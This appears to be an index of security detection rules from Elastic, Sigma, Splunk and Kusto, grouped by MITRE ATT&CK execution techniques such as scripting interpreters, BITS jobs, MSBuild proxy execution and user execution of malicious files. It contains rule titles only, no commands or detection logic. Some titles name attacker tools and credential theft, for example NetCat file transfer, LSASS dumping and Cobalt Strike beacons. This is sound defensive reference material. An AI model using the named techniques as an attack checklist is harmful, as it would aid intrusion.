Command and Scripting Interpreter: Unix Shell T1059.004 11 rules
- Elastic Attempt to Install or Run Kali Linux via WSL production
- Sigma Axios NPM Compromise Indicators - Linux experimental
- Sigma Axios NPM Compromise Indicators - macOS experimental
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Elastic Execution via Windows Subsystem for Linux production
- Elastic Host File System Changes via Windows Subsystem for Linux production
- Sigma Potentially Suspicious Long Filename Pattern - Linux experimental
- Elastic Suspicious Execution via Windows Subsystem for Linux production
- Elastic Windows Subsystem for Linux Distribution Installed production
Command and Scripting Interpreter: Visual Basic T1059.005 57 rules
- Sigma Adwind RAT / JRAT test
- Sigma Adwind RAT / JRAT File Artifact test
- Sigma AppLocker Prevented Application or Script from Running test
- Sigma Axios NPM Compromise Indicators - Windows experimental
- Elastic Command and Scripting Interpreter via Windows Scripts production
- Sigma Csc.EXE Execution Form Potentially Suspicious Parent test
- Sigma Cscript/Wscript Uncommon Script Extension Execution test
- Elastic Delayed Execution via Ping production
- Splunk Executable Process from Suspicious Folder (PowerShell)
- Splunk Executable Process from Suspicious Folder (Sysmon)
- Splunk Executable Process from Suspicious Folder (Windows Event Log)
- Splunk Execute Javascript With Jscript COM CLSID production
- Elastic Execution of a Downloaded Windows Script production
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - Koadic Execution test
- Sigma HackTool - NetExec File Indicators experimental
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Management Console File from Unusual Path production
- Sigma MMC Loading Script Engines DLLs experimental
- Sigma Potential APT10 Cloud Hopper Activity test
- Sigma Potential Dropper Script Execution Via WScript/CScript/MSHTA test
- Sigma Potential QBot Activity stable
- Sigma Potential Reconnaissance Activity Via GatherNetworkInfo.VBS test
- Sigma Potential Remote SquiblyTwo Technique Execution test
- Sigma Registry Modification Attempt Via VBScript experimental
- Sigma Registry Modification Attempt Via VBScript - PowerShell experimental
- Sigma Registry Tampering by Potentially Suspicious Processes experimental
- Elastic Remote File Download via Script Interpreter production
- Elastic Remote XSL Script Execution via COM production
- Elastic Scheduled Task Created by a Windows Script production
- Elastic Script Execution via Microsoft HTML Application production
- Kusto Script Interpreter Loading DotNet Assembly From Memory
- Elastic Service Control Spawned via Script Interpreter production
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious Child Process Of BgInfo.EXE test
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious HH.EXE Execution test
- Splunk Suspicious Process DNS Query Known Abuse Web Services production
- Splunk Suspicious Process With Discord DNS Query production
- Sigma Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS test
- Elastic Suspicious ScreenConnect Client Child Process production
- Sigma Suspicious Scripting in a WMI Consumer test
- Sigma Uncommon Child Process Of BgInfo.EXE test
- Splunk Vbscript Execution Using Wscript App production
- Splunk Windows Outlook Macro Created by Suspicious Process production
- Elastic Windows Script Executing PowerShell production
- Elastic Windows Script Execution from Archive production
- Elastic Windows Script Interpreter Executing Process via WMI production
- Sigma Windows Shell/Scripting Processes Spawning Suspicious Programs test
- Sigma WScript or CScript Dropper - File test
- Splunk Wscript_Cscript Execution (PowerShell)
- Splunk Wscript_Cscript Execution (Sysmon)
- Splunk Wscript_Cscript Execution (Windows Event Log)
- Sigma WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript test
- Sigma XSL Script Execution Via WMIC.EXE test
Command and Scripting Interpreter: Python T1059.006 11 rules
- Sigma AppLocker Prevented Application or Script from Running test
- Sigma Axios NPM Compromise Indicators - Linux experimental
- Sigma Emotet Loader Execution Via .LNK File test
- Sigma Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution test
- Splunk Python Execution (Windows Event Log)
- Sigma Python One-Liners with Base64 Decoding experimental
- Sigma Python Path Configuration File Creation - Linux test
- Sigma Python Path Configuration File Creation - MacOS test
- Sigma Python Path Configuration File Creation - Windows test
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Sigma Suspicious File Characteristics Due to Missing Fields test
Command and Scripting Interpreter: JavaScript T1059.007 45 rules
- Sigma Adwind RAT / JRAT test
- Sigma Adwind RAT / JRAT File Artifact test
- Sigma AppLocker Prevented Application or Script from Running test
- Elastic Command and Scripting Interpreter via Windows Scripts production
- Sigma Csc.EXE Execution Form Potentially Suspicious Parent test
- Sigma Cscript/Wscript Uncommon Script Extension Execution test
- Splunk Executable Process from Suspicious Folder (PowerShell)
- Splunk Executable Process from Suspicious Folder (Sysmon)
- Splunk Executable Process from Suspicious Folder (Windows Event Log)
- Elastic Execution of a Downloaded Windows Script production
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - Koadic Execution test
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Splunk Jscript Execution Using Cscript App production
- Elastic Microsoft Management Console File from Unusual Path production
- Splunk MS Scripting Process Loading Ldap Module production
- Splunk MS Scripting Process Loading WMI Module production
- Sigma MSHTA Execution with Suspicious File Extensions test
- Sigma Node Process Executions test
- Sigma NodeJS Execution of JavaScript File experimental
- Sigma Potential Dropper Script Execution Via WScript/CScript/MSHTA test
- Sigma Potential Remote SquiblyTwo Technique Execution test
- Sigma Potentially Suspicious Inline JavaScript Execution via NodeJS Binary experimental
- Elastic Remote File Download via Script Interpreter production
- Elastic Remote XSL Script Execution via COM production
- Elastic Script Execution via Microsoft HTML Application production
- Kusto Script Interpreter Loading DotNet Assembly From Memory
- Sigma Script Interpreter Spawning Credential Scanner - Windows experimental
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious Deno File Written from Remote Source experimental
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious Execution with NodeJS production
- Sigma Suspicious HH.EXE Execution test
- Elastic Suspicious JavaScript Execution via Deno production
- Splunk Windows Cmdline Tool Execution From Non-Shell Process production
- Splunk Windows GrimResource - MMC Process Accessing APDS DLL production
- Elastic Windows Script Executing PowerShell production
- Elastic Windows Script Execution from Archive production
- Elastic Windows Script Interpreter Executing Process via WMI production
- Sigma WScript or CScript Dropper - File test
- Splunk Wscript_Cscript Execution (PowerShell)
- Splunk Wscript_Cscript Execution (Sysmon)
- Splunk Wscript_Cscript Execution (Windows Event Log)
- Sigma WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript test
- Sigma XSL Script Execution Via WMIC.EXE test
Command and Scripting Interpreter: Cloud API T1059.009 1 rule
- Splunk Windows SQL Server Extended Procedure DLL Loading Hunt production
Command and Scripting Interpreter: AutoHotKey & AutoIT T1059.010 1 rule
- Elastic Renamed Automation Script Interpreter production
Software Deployment Tools T1072 11 rules
- Splunk Detection of tools built by NirSoft experimental
- Kusto New EXE deployed via Default Domain or Default Domain Controller Policies available
- Kusto New EXE deployed via Default Domain or Default Domain Controller Policies (ASIM Version)
- Sigma PDQ Deploy Remote Adminstartion Tool Execution test
- Elastic Potential WSUS Abuse for Lateral Movement production
- Sigma PUA - Radmin Viewer Utility Execution test
- Splunk Radmin execution (EDR)
- Splunk Radmin execution (Sysmon)
- Splunk Radmin execution (Windows Event Log)
- Sigma Restricted Software Access By SRP test
- Sigma Suspicious Csi.exe Usage test
Native API T1106 20 rules
- Sigma HackTool - CobaltStrike BOF Injection Pattern test
- Sigma HackTool - HandleKatz Duplicating LSASS Handle test
- Sigma HackTool - RedMimicry Winnti Playbook Execution test
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Kusto LSASS Dumping using Debug Privileges
- Elastic Persistence via Hidden Run Key Detected production
- Sigma Potential Binary Proxy Execution Via Cdb.EXE test
- Elastic Potential Credential Access via LSASS Memory Dump production
- Sigma Potential Direct Syscall of NtOpenProcess test
- Sigma Potential WinAPI Calls Via CommandLine test
- Sigma Potential WinAPI Calls Via PowerShell Scripts test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Kusto Process Injection From Untrusted Process
- Sigma Suspicious Mshta.EXE Execution Patterns test
- Elastic Suspicious Process Access via Direct System Call production
- Elastic Suspicious SolarWinds Child Process production
- Sigma Turla Group Named Pipes test
- Sigma WinAPI Function Calls Via PowerShell Scripts test
- Sigma WinAPI Library Calls Via PowerShell Scripts test
Trusted Developer Utilities Proxy Execution T1127 54 rules
- Sigma AspNetCompiler Execution test
- Sigma C# IL Code Compilation Via Ilasm.EXE test
- Splunk CDB Execution (Sysmon)
- Splunk CDB Execution (Windows Event Log)
- Elastic Delayed Execution via Ping production
- Sigma Detection of PowerShell Execution via Sqlps.exe test
- Splunk ETW Registry Disabled production
- Elastic Execution of Persistent Suspicious Program production
- Elastic Execution via Microsoft DotNet ClickOnce Host production
- Elastic Execution via MS VisualStudio Pre/Post Build Events production
- Sigma JScript Compiler Execution test
- Sigma Kavremover Dropped Binary LOLBIN Usage test
- Elastic Microsoft Build Engine Started by a System Process production
- Elastic Microsoft Build Engine Started by an Office Application production
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Build Engine Using an Alternate Name production
- Sigma Microsoft Workflow Compiler Execution test
- Elastic MsBuild Making Network Connections production
- Splunk MSBuild Suspicious Spawned By Script Process production
- Elastic Network Activity to a Suspicious Top Level Domain production
- Sigma Node Process Executions test
- Sigma Potential Arbitrary Code Execution Via Node.EXE test
- Sigma Potential Binary Proxy Execution Via Cdb.EXE test
- Elastic Potential Credential Access via Trusted Developer Utility production
- Sigma Potential Mftrace.EXE Abuse test
- Sigma Potentially Suspicious ASP.NET Compilation Via AspNetCompiler test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Process Injection by the Microsoft Build Engine production
- Splunk Proxy Execution via Appcert (PowerShell)
- Splunk Proxy Execution via Appcert (Sysmon)
- Splunk Proxy Execution via Appcert (Windows Event Log)
- Sigma Remote Thread Creation Ttdinject.exe Proxy test
- Sigma Silenttrinity Stager Msbuild Activity test
- Sigma SQL Client Tools PowerShell Session Detection test
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious Child Process of AspNetCompiler test
- Elastic Suspicious Execution from a Mounted Device production
- Sigma Suspicious File Created by ArcSOC.exe experimental
- Splunk Suspicious microsoft workflow compiler rename production
- Splunk Suspicious microsoft workflow compiler usage production
- Splunk Suspicious msbuild path production
- Splunk Suspicious MSBuild Rename production
- Splunk Suspicious MSBuild Spawn production
- Sigma Suspicious Use of CSharp Interactive Console test
- Kusto Trusted Developer Utilities Proxy Execution available
- Splunk Unusual AppCert Child Process (Sysmon)
- Splunk Unusual AppCert Child Process (Windows Event Log)
- Elastic Unusual Network Activity from a Windows System Binary production
- Elastic Unusual Process Network Connection production
- Sigma Use of Remote.exe test
- Sigma Use of TTDInject.exe test
- Sigma Use of VSIISExeLauncher.exe test
- Sigma Use of Wfc.exe test
Trusted Developer Utilities Proxy Execution: MSBuild T1127.001 20 rules
- Elastic Delayed Execution via Ping production
- Elastic Execution of Persistent Suspicious Program production
- Elastic Execution via MS VisualStudio Pre/Post Build Events production
- Elastic Microsoft Build Engine Started by a System Process production
- Elastic Microsoft Build Engine Started by an Office Application production
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Build Engine Using an Alternate Name production
- Elastic MsBuild Making Network Connections production
- Splunk MSBuild Suspicious Spawned By Script Process production
- Elastic Network Activity to a Suspicious Top Level Domain production
- Elastic Potential Credential Access via Trusted Developer Utility production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Process Injection by the Microsoft Build Engine production
- Sigma Silenttrinity Stager Msbuild Activity test
- Elastic Suspicious Execution from a Mounted Device production
- Splunk Suspicious msbuild path production
- Splunk Suspicious MSBuild Rename production
- Splunk Suspicious MSBuild Spawn production
- Elastic Unusual Network Activity from a Windows System Binary production
Trusted Developer Utilities Proxy Execution: ClickOnce T1127.002 1 rule
- Elastic Execution via Microsoft DotNet ClickOnce Host production
Shared Modules T1129 11 rules
- Elastic ImageLoad via Windows Update Auto Update Client production
- Sigma Katz Stealer DLL Loaded experimental
- Elastic Suspicious Execution via Microsoft Office Add-Ins production
- Elastic Suspicious SolarWinds Web Help Desk Java Module Load or Child Process production
- Sigma Unsigned .node File Loaded experimental
- Splunk Windows Executable in Loaded Modules production
- Splunk Windows PowerShell Module File Created production
- Splunk Windows PowerShell Script TabExpansion Direct Call production
- Splunk Windows Remote Image Load production
- Splunk Windows XLL File Creation Outside of Typical Location production
- Elastic WPS Office Exploitation via DLL Hijack production
BITS Jobs T1197 28 rules
- Sigma BITS Client BitsProxy DLL Loaded By Uncommon Process experimental
- Splunk BITS Job Persistence production
- Sigma BITS payload downloaded via commandline experimental
- Sigma BITS payload downloaded via PowerShell experimental
- Sigma BITS Transfer Job Download From Direct IP test
- Sigma BITS Transfer Job Download From File Sharing Domains test
- Sigma BITS Transfer Job Download To Potential Suspicious Folder test
- Sigma BITS Transfer Job Downloading File Potential Suspicious Extension test
- Sigma BITS Transfer Job With Uncommon Or Suspicious Remote TLD test
- Elastic Bitsadmin Activity production
- Kusto Bitsadmin Activity available
- Splunk BITSAdmin Download File production
- Splunk BITSadmin Execution (PowerShell)
- Splunk BITSadmin Execution (Sysmon)
- Splunk BITSadmin Execution (Windows Event Log)
- Splunk BitsAdmin NetCat PowerCat File Transfer (EDR)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Sysmon)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Windows Event Log)
- Sigma File Download Via Bitsadmin test
- Sigma File Download Via Bitsadmin To A Suspicious Target Folder test
- Sigma File With Suspicious Extension Downloaded Via Bitsadmin test
- Sigma Monitoring For Persistence Via BITS test
- Sigma New BITS Job Created Via Bitsadmin test
- Sigma New BITS Job Created Via PowerShell test
- Elastic Persistence via BITS Job Notify Cmdline production
- Splunk PowerShell Start-BitsTransfer production
- Sigma Suspicious Download From Direct IP Via Bitsadmin test
- Sigma Suspicious Download From File-Sharing Website Via Bitsadmin test
Exploitation for Client Execution T1203 44 rules
- Splunk Abuse EQNEDT32.EXE (EDR)
- Splunk Abuse EQNEDT32.EXE (Sysmon)
- Splunk Abuse EQNEDT32.EXE (Windows Event Log)
- Sigma Audit CVE Event test
- Elastic Creation of SettingContent-ms Files production
- Sigma CVE-2021-26858 Exchange Exploitation test
- Sigma CVE-2021-31979 CVE-2021-33771 Exploits test
- Sigma CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum test
- Sigma CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process test
- Sigma Dfsvc.EXE Initiated Network Connection Over Uncommon Port test
- Sigma Dfsvc.EXE Network Connection To Non-Local IPs test
- Sigma Droppers Exploiting CVE-2017-11882 stable
- Elastic Execution of File Written or Modified by Microsoft Office production
- Kusto Execution of software vulnerable to webp buffer overflow of CVE-2023-4863 available
- Sigma Exploit for CVE-2017-0261 test
- Sigma Exploit for CVE-2017-8759 test
- Sigma Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process experimental
- Sigma Java Running with Remote Debugging test
- Sigma Network Connection Initiated By Eqnedt32.EXE test
- Sigma Office Application Initiated Network Connection To Non-Local IP test
- Kusto Office Apps Launching Wscipt available
- Kusto PE file dropped in Color Profile Folder
- Sigma Potential CVE-2021-26857 Exploitation Attempt stable
- Elastic Potential CVE-2025-33053 Exploitation production
- Splunk Potential Follina_DogWalk Activity - mdst.exe (Sysmon)
- Elastic Potential Foxmail Exploitation production
- Elastic Potential Notepad Markdown RCE Exploitation production
- Sigma Potentially Suspicious Child Process of KeyScrambler.exe test
- Sigma Potentially Suspicious Child Process Of WinRAR.EXE test
- Sigma Shai-Hulud Malicious Bun Execution experimental
- Sigma Shai-Hulud Malicious Bun Execution - Linux experimental
- Splunk Sunburst Correlation DLL and Network Event experimental
- Sigma Suspicious ArcSOC.exe Child Process experimental
- Elastic Suspicious Communication App Child Process production
- Sigma Suspicious HWP Sub Processes test
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious Outlook Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Splunk Suspicious process Spawned by Java (Windows Event Log)
- Sigma Suspicious Spool Service Child Process test
- Elastic Suspicious Zoom Child Process production
- Splunk Windows MSC EvilTwin Directory Path Manipulation production
- Splunk Windows Remote Image Load production
- Elastic WPS Office Exploitation via DLL Hijack production
User Execution T1204 143 rules
- Splunk 3CXDesktopApp.exe Execution (EDR)
- Splunk 3CXDesktopApp.exe Execution (Sysmon)
- Splunk 3CXDesktopApp.exe Execution (Windows Event Log)
- Sigma AppLocker Prevented Application or Script from Running test
- Sigma Arbitrary Shell Command Execution Via Settingcontent-Ms test
- Kusto Audit policy manipulation using auditpol utility
- Splunk Batch File Write to System32 production
- Splunk Clop Common Exec Parameter production
- Sigma CLR DLL Loaded Via Office Applications test
- Splunk Command Line Spawned by Archive Utility - Windows (Sysmon)
- Splunk Command Line Spawned by Archive Utility - Windows (Windows Event Log)
- Splunk Conti Common Exec parameter production
- Elastic Creation of SettingContent-ms Files production
- Splunk CVE-2022-30190: Microsoft Office Code Execution Vulnerability (EDR)
- Splunk CVE-2022-30190: Microsoft Office Code Execution Vulnerability (Sysmon)
- Splunk CVE-2022-30190: Microsoft Office Code Execution Vulnerability (Windows Event Log)
- Sigma DarkSide Ransomware Pattern test
- Kusto Detect .NET runtime being loaded in JScript for code execution available
- Splunk Detect Rare Executables production
- Sigma DotNET Assembly DLL Loaded Via Office Application test
- Elastic Downloaded Shortcut Files production
- Elastic Downloaded URL Files production
- Splunk Drop IcedID License dat production
- Sigma Droppers Exploiting CVE-2017-11882 stable
- Sigma Edge abuse for payload download via console experimental
- Sigma Edge/Chrome headless feature abuse for payload download experimental
- Elastic Executable File Creation with Multiple Extensions production
- Splunk Executable Process from Suspicious Folder (PowerShell)
- Splunk Executable Process from Suspicious Folder (Sysmon)
- Splunk Executable Process from Suspicious Folder (Windows Event Log)
- Elastic Execution of a Downloaded Windows Script production
- Elastic Execution of File Written or Modified by Microsoft Office production
- Sigma Exploit for CVE-2017-0261 test
- Sigma Exploit for CVE-2017-8759 test
- Splunk Explorer Child Process with Suspicious Command Line Padding (Sysmon)
- Elastic File with Right-to-Left Override Character (RTLO) Created/Executed production
- Elastic File with Suspicious Extension Downloaded production
- Sigma File With Uncommon Extension Created By An Office Application test
- Sigma FileFix - Command Evidence in TypedPaths experimental
- Sigma GAC DLL Loaded Via Office Applications test
- Sigma HackTool - LittleCorporal Generated Maldoc Injection test
- Splunk ISO File in Temp Folder (Windows Event Log)
- Splunk ISO Image Mounted - Windows (PowerShell)
- Splunk ISO Image Mounted - Windows (Windows Event Log)
- Sigma Kapeka Backdoor Loaded Via Rundll32.EXE test
- Splunk Malicious Document Execution (Sysmon)
- Splunk Malicious Document Execution (Windows Event Log)
- Elastic Microsoft Build Engine Started by an Office Application production
- Splunk Microsoft Diagnostic Tool "DogWalk" Package Path Traversal (EDR)
- Splunk Microsoft Diagnostic Tool "DogWalk" Package Path Traversal (Sysmon)
- Splunk Microsoft Diagnostic Tool "DogWalk" Package Path Traversal (Windows Event Log)
- Sigma Microsoft Excel Add-In Loaded test
- Sigma Microsoft Excel Add-In Loaded From Uncommon Location test
- Elastic Microsoft Management Console File from Unusual Path production
- Sigma Microsoft VBA For Outlook Addin Loaded Via Outlook test
- Sigma Microsoft Word Add-In Loaded test
- Sigma MMC Executing Files with Reversed Extensions Using RTLO Abuse experimental
- Elastic MS Office Macro Security Registry Modifications production
- Elastic Network Connection via Compiled HTML File production
- Sigma New Application in AppCompat test
- Splunk Office Spawns Suspicious Child Process (Sysmon)
- Splunk Office Spawns Suspicious Child Process (Windows Event Log)
- Sigma Potential ClickFix Execution Pattern - Registry experimental
- Splunk Potential CVE-2024-21413: Outbound SMB from Outlook (Sysmon)
- Splunk Potential CVE-2024-21413: Outbound SMB from Outlook (Windows Event Log)
- Elastic Potential Execution via FileFix Phishing Attack production
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Elastic Potential Masquerading as Business App Installer production
- Sigma Potential Maze Ransomware Activity test
- Elastic Potential Notepad Markdown RCE Exploitation production
- Sigma Potential Snatch Ransomware Activity stable
- Sigma Potential Suspicious Browser Launch From Document Reader Process test
- Sigma Potentially Suspicious WebDAV LNK Execution test
- Sigma PrinterNightmare Mimikatz Driver Name test
- Elastic Process Activity via Compiled HTML File production
- Splunk Process Executed from Downloads Folder - Windows (Sysmon)
- Splunk Process Executed from Downloads Folder - Windows (Windows Event Log)
- Splunk Rare executable from Microsoft Office (Sysmon)
- Splunk Rare executable from Microsoft Office (Windows Event Log)
- Splunk Rare Process Execution (Sysmon)
- Splunk Rare Process Execution (Windows Event Log)
- Elastic Remote Desktop File Opened from Suspicious Path production
- Sigma Remote DLL Load Via Rundll32.EXE test
- Splunk Revil Common Exec Parameter production
- Splunk Single Letter Process On Endpoint production
- Sigma Successful MSIX/AppX Package Installation experimental
- Sigma Suspicious Binaries and Scripts in Public Folder experimental
- Sigma Suspicious Binary In User Directory Spawned From Office Application test
- Sigma Suspicious ClickFix/FileFix Execution Pattern experimental
- Sigma Suspicious Deno File Written from Remote Source experimental
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from a WebDav Share production
- Elastic Suspicious Execution from INET Cache production
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious Execution via Microsoft Office Add-Ins production
- Sigma Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix experimental
- Sigma Suspicious FileFix Execution Pattern experimental
- Elastic Suspicious HTML File Creation production
- Sigma Suspicious LNK Command-Line Padding with Whitespace Characters experimental
- Sigma Suspicious Microsoft Office Child Process test
- Elastic Suspicious MS Outlook Child Process production
- Kusto Suspicious office child process created
- Sigma Suspicious Outlook Child Process test
- Elastic Suspicious PDF Reader Child Process production
- Splunk Suspicious Process Executed From Container File production
- Kusto Suspicious Process Injection from Office application available
- Sigma Suspicious Space Characters in RunMRU Registry Path - ClickFix experimental
- Sigma Suspicious Space Characters in TypedPaths Registry Path - FileFix experimental
- Sigma Suspicious Startup Folder Persistence test
- Elastic Suspicious Troubleshooting Pack Cabinet Execution production
- Sigma Suspicious WMIC Execution Via Office Process test
- Sigma Suspicious WmiPrvSE Child Process test
- Splunk Symbolic OR Hard File Link Created (PowerShell)
- Splunk Symbolic OR Hard File Link Created (Windows Event Log)
- Elastic Unusual Execution via Microsoft Common Console File production
- Sigma VBA DLL Loaded Via Office Application test
- Kusto VTI - High Severity SHA1 Collision Detection
- Splunk WebDAV LNK Execution (Sysmon)
- Splunk WebDAV LNK Execution (Windows Event Log)
- Splunk Windows Advanced Installer MSIX with AI_STUBS Execution production
- Sigma Windows AppX Deployment Full Trust Package Installation experimental
- Splunk Windows AppX Deployment Full Trust Package Installation production
- Splunk Windows AppX Deployment Package Installation Success production
- Sigma Windows AppX Deployment Unsigned Package Installation experimental
- Splunk Windows AppX Deployment Unsigned Package Installation production
- Splunk Windows Binary Execution from an Archive experimental
- Splunk Windows Default Cobalt Strike PowerShell Beacon production
- Splunk Windows Developer-Signed MSIX Package Installation production
- Splunk Windows EFI Volume Mount Attempt Via Mountvol production
- Splunk Windows Explorer LNK Exploit Process Launch With Padding production
- Splunk Windows Explorer.exe Spawning PowerShell or Cmd production
- Splunk Windows ISO LNK File Creation production
- Splunk Windows MSIX Package Interaction production
- Sigma Windows MSIX Package Support Framework AI_STUBS Execution experimental
- Splunk Windows Mustang Panda USB Tool Execution production
- Splunk Windows NorthStar C2 Agent Execution production
- Splunk Windows PowerShell FakeCAPTCHA Clipboard Execution production
- Splunk Windows PowerShell Script From WindowsApps Directory production
- Elastic Windows Script Execution from Archive production
- Splunk Windows Suspect Process With Authentication Traffic production
- Splunk Windows Suspicious QEMU Execution production
- Splunk Windows Universal Data Link File Creation production
- Splunk Windows User Execution Malicious URL Shortcut File production
User Execution: Malicious Link T1204.001 8 rules
- Splunk Malicious Document Execution (Sysmon)
- Splunk Malicious Document Execution (Windows Event Log)
- Sigma Potential ClickFix Execution Pattern - Registry experimental
- Splunk Potential CVE-2024-21413: Outbound SMB from Outlook (Sysmon)
- Splunk Potential CVE-2024-21413: Outbound SMB from Outlook (Windows Event Log)
- Sigma Suspicious ClickFix/FileFix Execution Pattern experimental
- Splunk Windows ISO LNK File Creation production
- Splunk Windows PowerShell FakeCAPTCHA Clipboard Execution production
User Execution: Malicious File T1204.002 103 rules
- Splunk 3CXDesktopApp.exe Execution (EDR)
- Splunk 3CXDesktopApp.exe Execution (Sysmon)
- Splunk 3CXDesktopApp.exe Execution (Windows Event Log)
- Sigma AppLocker Prevented Application or Script from Running test
- Splunk Batch File Write to System32 production
- Sigma CLR DLL Loaded Via Office Applications test
- Splunk Command Line Spawned by Archive Utility - Windows (Sysmon)
- Splunk Command Line Spawned by Archive Utility - Windows (Windows Event Log)
- Elastic Creation of SettingContent-ms Files production
- Splunk CVE-2022-30190: Microsoft Office Code Execution Vulnerability (EDR)
- Splunk CVE-2022-30190: Microsoft Office Code Execution Vulnerability (Sysmon)
- Splunk CVE-2022-30190: Microsoft Office Code Execution Vulnerability (Windows Event Log)
- Sigma DotNET Assembly DLL Loaded Via Office Application test
- Elastic Downloaded Shortcut Files production
- Elastic Downloaded URL Files production
- Splunk Drop IcedID License dat production
- Sigma Droppers Exploiting CVE-2017-11882 stable
- Elastic Executable File Creation with Multiple Extensions production
- Elastic Execution of a Downloaded Windows Script production
- Elastic Execution of File Written or Modified by Microsoft Office production
- Sigma Exploit for CVE-2017-0261 test
- Sigma Exploit for CVE-2017-8759 test
- Splunk Explorer Child Process with Suspicious Command Line Padding (Sysmon)
- Elastic File with Right-to-Left Override Character (RTLO) Created/Executed production
- Elastic File with Suspicious Extension Downloaded production
- Sigma File With Uncommon Extension Created By An Office Application test
- Sigma GAC DLL Loaded Via Office Applications test
- Sigma HackTool - LittleCorporal Generated Maldoc Injection test
- Splunk ISO File in Temp Folder (Windows Event Log)
- Splunk ISO Image Mounted - Windows (PowerShell)
- Splunk ISO Image Mounted - Windows (Windows Event Log)
- Sigma Kapeka Backdoor Loaded Via Rundll32.EXE test
- Splunk Malicious Document Execution (Sysmon)
- Splunk Malicious Document Execution (Windows Event Log)
- Elastic Microsoft Build Engine Started by an Office Application production
- Sigma Microsoft Excel Add-In Loaded test
- Sigma Microsoft Excel Add-In Loaded From Uncommon Location test
- Elastic Microsoft Management Console File from Unusual Path production
- Sigma Microsoft VBA For Outlook Addin Loaded Via Outlook test
- Sigma Microsoft Word Add-In Loaded test
- Sigma MMC Executing Files with Reversed Extensions Using RTLO Abuse experimental
- Elastic MS Office Macro Security Registry Modifications production
- Elastic Network Connection via Compiled HTML File production
- Sigma New Application in AppCompat test
- Splunk Office Spawns Suspicious Child Process (Sysmon)
- Splunk Office Spawns Suspicious Child Process (Windows Event Log)
- Elastic Potential Execution via FileFix Phishing Attack production
- Elastic Potential Masquerading as Business App Installer production
- Sigma Potential Maze Ransomware Activity test
- Elastic Potential Notepad Markdown RCE Exploitation production
- Sigma Potential Suspicious Browser Launch From Document Reader Process test
- Elastic Process Activity via Compiled HTML File production
- Splunk Rare executable from Microsoft Office (Sysmon)
- Splunk Rare executable from Microsoft Office (Windows Event Log)
- Splunk Rare Process Execution (Sysmon)
- Splunk Rare Process Execution (Windows Event Log)
- Elastic Remote Desktop File Opened from Suspicious Path production
- Sigma Remote DLL Load Via Rundll32.EXE test
- Splunk Single Letter Process On Endpoint production
- Sigma Successful MSIX/AppX Package Installation experimental
- Sigma Suspicious Binary In User Directory Spawned From Office Application test
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from a WebDav Share production
- Elastic Suspicious Execution from INET Cache production
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious Execution via Microsoft Office Add-Ins production
- Elastic Suspicious HTML File Creation production
- Sigma Suspicious LNK Command-Line Padding with Whitespace Characters experimental
- Sigma Suspicious Microsoft Office Child Process test
- Elastic Suspicious MS Outlook Child Process production
- Sigma Suspicious Outlook Child Process test
- Elastic Suspicious PDF Reader Child Process production
- Splunk Suspicious Process Executed From Container File production
- Sigma Suspicious Startup Folder Persistence test
- Elastic Suspicious Troubleshooting Pack Cabinet Execution production
- Sigma Suspicious WMIC Execution Via Office Process test
- Sigma Suspicious WmiPrvSE Child Process test
- Splunk Symbolic OR Hard File Link Created (PowerShell)
- Splunk Symbolic OR Hard File Link Created (Windows Event Log)
- Elastic Unusual Execution via Microsoft Common Console File production
- Sigma VBA DLL Loaded Via Office Application test
- Splunk Windows Advanced Installer MSIX with AI_STUBS Execution production
- Sigma Windows AppX Deployment Full Trust Package Installation experimental
- Splunk Windows AppX Deployment Full Trust Package Installation production
- Splunk Windows AppX Deployment Package Installation Success production
- Sigma Windows AppX Deployment Unsigned Package Installation experimental
- Splunk Windows AppX Deployment Unsigned Package Installation production
- Splunk Windows Binary Execution from an Archive experimental
- Splunk Windows Default Cobalt Strike PowerShell Beacon production
- Splunk Windows Developer-Signed MSIX Package Installation production
- Splunk Windows EFI Volume Mount Attempt Via Mountvol production
- Splunk Windows Explorer LNK Exploit Process Launch With Padding production
- Splunk Windows Explorer.exe Spawning PowerShell or Cmd production
- Splunk Windows MSIX Package Interaction production
- Sigma Windows MSIX Package Support Framework AI_STUBS Execution experimental
- Splunk Windows Mustang Panda USB Tool Execution production
- Splunk Windows NorthStar C2 Agent Execution production
- Splunk Windows PowerShell Script From WindowsApps Directory production
- Elastic Windows Script Execution from Archive production
